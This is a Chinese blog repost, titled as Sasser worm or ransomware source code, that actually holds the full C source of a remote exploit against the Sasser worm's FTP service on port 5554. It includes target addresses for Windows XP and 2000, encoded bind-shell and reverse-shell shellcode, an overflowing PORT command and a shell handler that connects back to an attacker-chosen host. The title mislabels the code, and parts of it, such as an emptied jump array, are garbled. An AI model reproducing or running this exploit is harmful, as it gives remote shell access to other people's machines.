震荡波病毒原代码(勒索病毒源代码)

#include#include#include#include#include#defineNORM”/033[00;00m”#defineGREEN”/033[01;32m”#defineYELL”/033[01;33m”#defineRED”/033[01;31m”#defineBANNERGREEN”[%%]”YELL”mandrag

大家好,又见面了,我是你们的朋友全栈君。#include <stdio.h>

#include <strings.h>

#include <signal.h>

#include <netinet/in.h>

#include <netdb.h>

#define NORM “/033[00;00m”

#define GREEN “/033[01;32m”

#define YELL “/033[01;33m”

#define RED “/033[01;31m”

#define BANNER GREEN “[%%] ” YELL “mandragore’s sploit v1.3 for ” RED “sasser.x” NORM

#define fatal(x) { perror(x); exit(1); }

#define default_port 5554

struct { char *os; long goreg; long gpa; long lla;}

targets[] = {

// { “os”, go ebx or pop pop ret, GetProcAd ptr, LoadLib ptr },

{ “wXP SP1 all”, 0x77C0BF21, 0x77be10CC, 0x77be10D0 },

{ “w2k SP4 all”, 0x7801D081, 0x780320cc, 0x780320d0 },

}, tsz;

unsigned char bsh[]={

0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xDD,0x80,0x36,0xDE,0x46,0xE2,0xFA,

0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,

0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,

0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,

0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,

0x0E,0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0x36,

0xDB,0xDE,0xDE,0xDE,0xBC,0xB7,0xB0,0xBA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,

0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xB2,0xB7,0xAD,0xAA,0xBB,0xB0,0xDE,0x89,0x21,0xC8,

0x21,0x0E,0xB4,0xDE,0x8A,0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xBF,0xBD,0xBD,0xBB,0xAE,

0xAA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,0x87,0x55,0x22,

0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,

0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,

0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,

0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,

0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,

0xC8,0x21,0x0E

};

unsigned char rsh[]={

0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB6,0x80,0x36,0xDE,0x46,0xE2,0xFA,

0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,

0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,

0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,

0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,

0x0E,0x4D,0xB6,0xA1,0xDE,0xDE,0xDF,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,

0x8E,0x8D,0x36,0xD6,0xDE,0xDE,0xDE,0xBD,0xB1,0xB0,0xB0,0xBB,0xBD,0xAA,0xDE,0x89,

0x21,0xC8,0x21,0x0E,0xB4,0xCE,0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,

0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,

0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,

0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,

0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,

0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,0xC8,0x21,0x0E

};

char verbose=0;

void setoff(long GPA, long LLA) {

int gpa=GPA^0xdededede, lla=LLA^0xdededede;

memcpy(bsh+0x1d,&gpa,4);

memcpy(bsh+0x2e,&lla,4);

memcpy(rsh+0x1d,&gpa,4);

memcpy(rsh+0x2e,&lla,4);

}

void usage(char *argv0) {

int i;

printf(“%s -d <host/ip> [opts]/n/n”,argv0);

printf(“Options:/n”);

printf(” -h undocumented/n”);

printf(” -p <port> to connect to [default: %u]/n”,default_port);

printf(” -s <‘bind’/’rev’> shellcode type [default: bind]/n”);

printf(” -P <port> for the shellcode [default: 530]/n”);

printf(” -H <host/ip> for the reverse shellcode/n”);

printf(” -L setup the listener for the reverse shell/n”);

printf(” -t <target type> [default 0]; choose below/n/n”);

printf(“Types:/n”);

for(i = 0; i < sizeof(targets)/sizeof(tsz); i++)

printf(” %d %s/t[0x%.8x]/n”, i, targets[i].os, targets[i].goreg);

exit(1);

}

void shell(int s) {

char buff[4096];

int retval;

fd_set fds;

printf(“[+] connected!/n/n”);

for (;;) {

FD_ZERO(&fds);

FD_SET(0,&fds);

FD_SET(s,&fds);

if (select(s+1, &fds, NULL, NULL, NULL) < 0)

fatal(“[-] shell.select()”);

if (FD_ISSET(0,&fds)) {

if ((retval = read(1,buff,4096)) < 1)

fatal(“[-] shell.recv(stdin)”);

send(s,buff,retval,0);

}

if (FD_ISSET(s,&fds)) {

if ((retval = recv(s,buff,4096,0)) < 1)

fatal(“[-] shell.recv(socket)”);

write(1,buff,retval);

}

}

}

void callback(short port) {

struct sockaddr_in sin;

int s,slen=16;

sin.sin_family = 2;

sin.sin_addr.s_addr = 0;

sin.sin_port = htons(port);

s=socket(2,1,6);

if ( bind(s,(struct sockaddr *)&sin, 16) ) {

kill(getppid(),SIGKILL);

fatal(“[-] shell.bind”);

}

listen(s,1);

s=accept(s,(struct sockaddr *)&sin,&slen);

shell(s);

printf(“crap/n”);

}

int main(int argc, char **argv, char **env) {

struct sockaddr_in sin;

struct hostent *he;

char *host; int port=default_port;

char *Host; int Port=5300; char bindopt=1;

int i,s,pid=0,rip;

char *buff;

int type=0;

char *jmp[]=;

printf(BANNER “/n”);

if (argc==1)

usage(argv[0]);

for (i=1;i<argc;i+=2) {

if (strlen(argv[i]) != 2)

usage(argv[0]);

switch(argv[i][1]) {

case ‘t’:

type=atoi(argv[i+1]);

break;

case ‘d’:

host=argv[i+1];

break;

case ‘p’:

port=atoi(argv[i+1])?:default_port;

break;

case ‘s’:

if (strstr(argv[i+1],”rev”))

bindopt=0;

break;

case ‘H’:

Host=argv[i+1];

break;

case ‘P’:

Port=atoi(argv[i+1])?:5300;

Port=Port ^ 0xdede;

Port=(Port & 0xff) << 8 | Port >>8;

memcpy(bsh+0x57,&Port,2);

memcpy(rsh+0x5a,&Port,2);

Port=Port ^ 0xdede;

Port=(Port & 0xff) << 8 | Port >>8;

break;

case ‘L’:

pid++; i–;

break;

case ‘v’:

verbose++; i–;

break;

case ‘h’:

usage(argv[0]);

default:

usage(argv[0]);

}

}

if (verbose)

printf(“verbose!/n”);

if ((he=gethostbyname(host))==NULL)

fatal(“[-] gethostbyname()”);

sin.sin_family = 2;

sin.sin_addr = *((struct in_addr *)he->h_addr_list[0]);

sin.sin_port = htons(port);

printf(“[.] launching attack on %s:%d../n”,inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),port);

if (bindopt)

printf(“[.] will try to put a bindshell on port %d./n”,Port);

else {

if ((he=gethostbyname(Host))==NULL)

fatal(“[-] gethostbyname() for -H”);

rip=*((long *)he->h_addr_list[0]);

rip=rip^0xdededede;

memcpy(rsh+0x53,&rip,4);

if (pid) {

printf(“[.] setting up a listener on port %d./n”,Port);

pid=fork();

switch (pid) { case 0: callback(Port); }

} else

printf(“[.] you should have a listener on %s:%d./n”,inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),Port);

}

printf(“[.] using type ‘%s’/n”,targets[type].os);

// ——————– core

s=socket(2,1,6);

if (connect(s,(struct sockaddr *)&sin,16)!=0) {

if (pid) kill(pid,SIGKILL);

fatal(“[-] connect()”);

}

printf(“[+] connected, sending exploit/n”);

buff=(char *)malloc(4096);

bzero(buff,4096);

sprintf(buff,”USER x/n”);

send(s,buff,strlen(buff),0);

recv(s,buff,4095,0);

sprintf(buff,”PASS x/n”);

send(s,buff,strlen(buff),0);

recv(s,buff,4095,0);

memset(buff+0000,0×90,2000);

strncpy(buff,”PORT “,5);

strcat(buff,”/x0a”);

memcpy(buff+272,jmp[0],2);

memcpy(buff+276,&targets[type].goreg,4);

memcpy(buff+280,jmp[1],5);

setoff(targets[type].gpa, targets[type].lla);

if (bindopt)

memcpy(buff+300,&bsh,strlen(bsh));

else

memcpy(buff+300,&rsh,strlen(rsh));

send(s,buff,strlen(buff),0);

free(buff);

close(s);

// ——————– end of core

if (bindopt) {

sin.sin_port = htons(Port);

sleep(1);

s=socket(2,1,6);

if (connect(s,(struct sockaddr *)&sin,16)!=0)

fatal(“[-] exploit most likely failed”);

shell(s);

}

if (pid) wait(&pid);

exit(0);

}

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/129578.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(1)


相关推荐

  • Android中Calendar类的用法总结[通俗易懂]

    Android中Calendar类的用法总结[通俗易懂]Calendar是Android开发中需要获取时间时必不可少的一个工具类,通过这个类可以获得的时间信息还是很丰富的,下面做一个总结,以后使用的时候就不用总是去翻书或者查资料了。

  • 70多套java必练项目,适合小白上手!

    70多套java必练项目,适合小白上手!导读:这些项目不管是找工作练手,还是公司使用当作模板进一步改进,亦或者是当作毕业设计,都很有借鉴意义!编译器建议使用:IDEA,Myeclipse,eclipse,HB-X等都可以。数据库建议使用,mysql,oracle,sqlsever数据库工具建议使用:SQLyog,navicate目录项目截图:项目地址:java实现银行柜员业务绩效考核系统java实现挖掘机配件营销系统Java实现酒店管理系统Java停车场管理系统Java实现的健身俱乐部会员系统..

  • 50道经典MySQL练习题(含解答)

    50道经典MySQL练习题(含解答)本文摘要:本篇主要分享50道经典MySQL练习题(含解答)。

  • 几款Android 应用自动化测试工具「建议收藏」

    简述:本文介绍几款流行的Android应用自动化测试工具。Monkey测试:随机测试,压力测试,运行在模拟器或实际设备中。MonkeyRunner测试:操作简单,可录制测试脚本,可视化操作,主要生成坐标的自动化操作,移植性不强Robotium 测试Ronaorex 测试Appium测试UIAutomator测试Test

  • 求Sn=a+aa+aaa+…+aaa…a的值

    求Sn=a+aa+aaa+…+aaa…a的值

  • shell getopt「建议收藏」

    shell getopt「建议收藏」getopt简介命令语法解析规则短选项长选项双引号的作用shell脚本示例shift命令set命令eval实际运行最后getopt简介以下主要翻译自mangetopt。getopt是用来解析传入shell的命令行参数的,它可以支持如‘rm-r’中’-r’形式的参数解析。命令语法先从一个较为明了的语法开始getopt-ooptstring–paramete

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号